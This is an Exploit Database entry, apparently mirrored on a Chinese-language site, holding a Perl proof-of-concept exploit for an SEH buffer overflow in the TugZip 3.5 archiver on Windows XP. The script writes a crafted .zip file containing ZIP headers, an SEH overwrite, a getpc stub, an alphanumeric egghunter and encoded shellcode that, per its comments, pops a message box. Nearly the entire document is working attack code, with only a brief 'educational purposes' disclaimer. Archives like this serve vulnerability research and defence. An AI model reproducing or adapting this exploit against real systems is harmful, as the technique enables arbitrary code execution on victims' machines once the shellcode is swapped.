TugZip 3.5 Archiver – ‘.ZIP’ File Buffer Overflow

Exploit Database
108 阅读

作者： Lincoln

日期： 2010-04-01
类别：
- local
平台：
- windows
来源：https://www.exploit-db.com/exploits/12008/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

#!/usr/bin/perl

# Software: TugZip 3.5 (.zip)

# Author: Lincoln

# Assisted by : corelanc0d3r

# OS: Windows

# Tested on : XP SP3 En (VirtualBox)

# Type of vuln: SEH

# Greetz to : Corelan Security Team

# http://www.corelan.be:8800/index.php/security/corelan-team-members/

# Script provided 'as is', without any warranty.

# Use for educational purposes only.

# Do not use this code to do anything illegal !

# Note : you are not allowed to edit/modify this code.

# If you do, Corelan cannot be held responsible for any damages this may cause.

# Code :

print "|------------------------------------------------------------------|\n";

print "| __ __|\n";

print "| _________________/ /___ _____ / /________ _____ ___|\n";

print "|/ ___/ __ \\/ ___/ _ \\/ / __ <code>/ __ \\ / __/ _ \\/ __ </code>/ __ `__ \\ |\n";

print "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |\n";

print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/|\n";

print "||\n";

print "| http://www.corelan.be:8800 |\n";

print "||\n";

print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";

print "[+] Exploit for TugZip 3.5 \n";

my $filename="tugzip.zip";

my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .

"\x00\x00\x00\x00\x00\x00\x00\x00" .

"\xb8\x0b" .# 3k size

"\x00\x00\x00";

my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .

"\x00\x00\x00\x00\x00\x00\x00\x00\x00".

"\xb8\x0b". # 3k size

"\x00\x00\x00\x00\x00\x00\x01\x00".

"\x24\x00\x00\x00\x00\x00\x00\x00";

my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00".

"\xe6\x0b\x00\x00". # +46

"\xe5\x0b\x00\x00". # +30

"\x00\x00";

#Only about 120 bytes after p/p/r

my $getpc =

#align regs into ebx

"\x61\x61\x61\x61\x61\x5b".

#getpc: http://www.corelan.be:8800/index.php/2010/03/27/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion/

"\x89\x05". #jmp short (5 bytes) to 'jmp back' at end

"\x5e". #pop esi

"\x41". #nop (inc ecx)

"\x98\x99". #call esi

"\x41". #nop (inc ecx)

"\x8a\x94\x98\x98\x98";#jmp back to pop esi

#mov ebx into egghunter starting location, base reg esi

my $egg =

"VYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIK9Jzs".

"rbrRJuRRxzmvNWLWuQJt4ZOnXPwtpTpQdLKJZLoPuzJNO3EXgkOJGA";

#msgbox: "Exploited by Corelan Security Team"

my $shellcode =

"w00tw00t".

"\x89\xe3\xda\xd7\xd9\x73\xf4\x59\x49\x49\x49\x49\x49\x49" .

"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" .

"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .

"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .

"\x75\x4a\x49\x4a\x79\x4a\x4b\x4d\x4b\x4b\x69\x51\x64\x45" .

"\x74\x4a\x54\x45\x61\x4e\x32\x4e\x52\x42\x5a\x46\x51\x49" .

"\x59\x42\x44\x4e\x6b\x51\x61\x44\x70\x4c\x4b\x43\x46\x44" .

"\x4c\x4e\x6b\x42\x56\x47\x6c\x4c\x4b\x51\x56\x44\x48\x4c" .

"\x4b\x51\x6e\x45\x70\x4e\x6b\x45\x66\x50\x38\x50\x4f\x47" .

"\x68\x50\x75\x4c\x33\x50\x59\x45\x51\x4b\x61\x4b\x4f\x48" .

"\x61\x51\x70\x4c\x4b\x50\x6c\x46\x44\x45\x74\x4c\x4b\x51" .

"\x55\x47\x4c\x4c\x4b\x50\x54\x43\x35\x50\x78\x43\x31\x4b" .

"\x5a\x4c\x4b\x42\x6a\x47\x68\x4e\x6b\x43\x6a\x47\x50\x45" .

"\x51\x4a\x4b\x48\x63\x46\x57\x50\x49\x4e\x6b\x44\x74\x4c" .

"\x4b\x45\x51\x4a\x4e\x44\x71\x49\x6f\x50\x31\x4b\x70\x4b" .

"\x4c\x4e\x4c\x4f\x74\x4b\x70\x43\x44\x46\x6a\x4a\x61\x4a" .

"\x6f\x44\x4d\x47\x71\x4b\x77\x48\x69\x4a\x51\x4b\x4f\x49" .

"\x6f\x49\x6f\x45\x6b\x43\x4c\x45\x74\x51\x38\x51\x65\x49" .

"\x4e\x4e\x6b\x42\x7a\x45\x74\x45\x51\x4a\x4b\x43\x56\x4e" .

"\x6b\x46\x6c\x42\x6b\x4c\x4b\x43\x6a\x45\x4c\x43\x31\x4a" .

"\x4b\x4e\x6b\x45\x54\x4e\x6b\x47\x71\x4d\x38\x4f\x79\x51" .

"\x54\x46\x44\x47\x6c\x45\x31\x4a\x63\x4f\x42\x44\x48\x46" .

"\x49\x48\x54\x4f\x79\x4b\x55\x4d\x59\x49\x52\x50\x68\x4c" .

"\x4e\x50\x4e\x44\x4e\x48\x6c\x50\x52\x4b\x58\x4d\x4c\x4b" .

"\x4f\x49\x6f\x4b\x4f\x4f\x79\x51\x55\x46\x64\x4d\x6b\x51" .

"\x6e\x49\x48\x4d\x32\x51\x63\x4c\x47\x45\x4c\x44\x64\x51" .

"\x42\x4d\x38\x4e\x6b\x49\x6f\x49\x6f\x4b\x4f\x4c\x49\x42" .

"\x65\x47\x78\x43\x58\x42\x4c\x50\x6c\x45\x70\x4b\x4f\x51" .

"\x78\x47\x43\x45\x62\x46\x4e\x45\x34\x45\x38\x51\x65\x51" .

"\x63\x45\x35\x44\x32\x4d\x58\x51\x4c\x44\x64\x44\x4a\x4c" .

"\x49\x48\x66\x43\x66\x4b\x4f\x43\x65\x46\x64\x4c\x49\x4b" .

"\x72\x50\x50\x4d\x6b\x4e\x48\x4c\x62\x50\x4d\x4d\x6c\x4e" .

"\x67\x47\x6c\x47\x54\x46\x32\x4b\x58\x43\x6e\x49\x6f\x49" .

"\x6f\x49\x6f\x42\x48\x51\x74\x45\x71\x51\x48\x45\x70\x43" .

"\x58\x44\x30\x43\x47\x42\x4e\x42\x45\x44\x71\x4b\x6b\x4b" .

"\x38\x43\x6c\x45\x74\x46\x66\x4b\x39\x48\x63\x45\x38\x50" .

"\x61\x42\x4d\x50\x58\x45\x70\x51\x78\x42\x59\x45\x70\x50" .

"\x54\x51\x75\x51\x78\x44\x35\x43\x42\x50\x69\x51\x64\x43" .

"\x58\x51\x30\x43\x63\x45\x35\x43\x53\x51\x78\x42\x45\x42" .

"\x4c\x50\x61\x50\x6e\x42\x48\x51\x30\x51\x53\x50\x6f\x50" .

"\x72\x45\x38\x43\x54\x51\x30\x50\x62\x43\x49\x51\x78\x42" .

"\x4f\x43\x59\x42\x54\x50\x65\x51\x78\x42\x65\x51\x68\x42" .

"\x50\x50\x6c\x46\x51\x48\x49\x4e\x68\x50\x4c\x46\x44\x45" .

"\x72\x4d\x59\x49\x71\x44\x71\x4a\x72\x43\x62\x43\x63\x50" .

"\x51\x46\x32\x4b\x4f\x48\x50\x50\x31\x4f\x30\x46\x30\x4b" .

"\x4f\x51\x45\x44\x48\x45\x5a\x41\x41";

# --- payload ---

my $size=2996;

my $junk = "A" x 372;

my $nseh="\x61\x5c\x7a\x04"; #Small space, take advantage!

my $seh ="\x7e\x30\x0c\x7e";#ztvcabin.7E0C307E

my $payload = $junk.$nseh.$seh.$getpc.$egg.$shellcode;

my $rest = "D" x ($size - length($payload)); #more room

$payload = $payload . $rest. ".txt";

print "[+] Size : " . length($payload)."\n";

system("del $filename");

print "[+] Creating new vulnerable file: $filename\n\n";

open(FILE, ">$filename");

print FILE $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header;

close(FILE);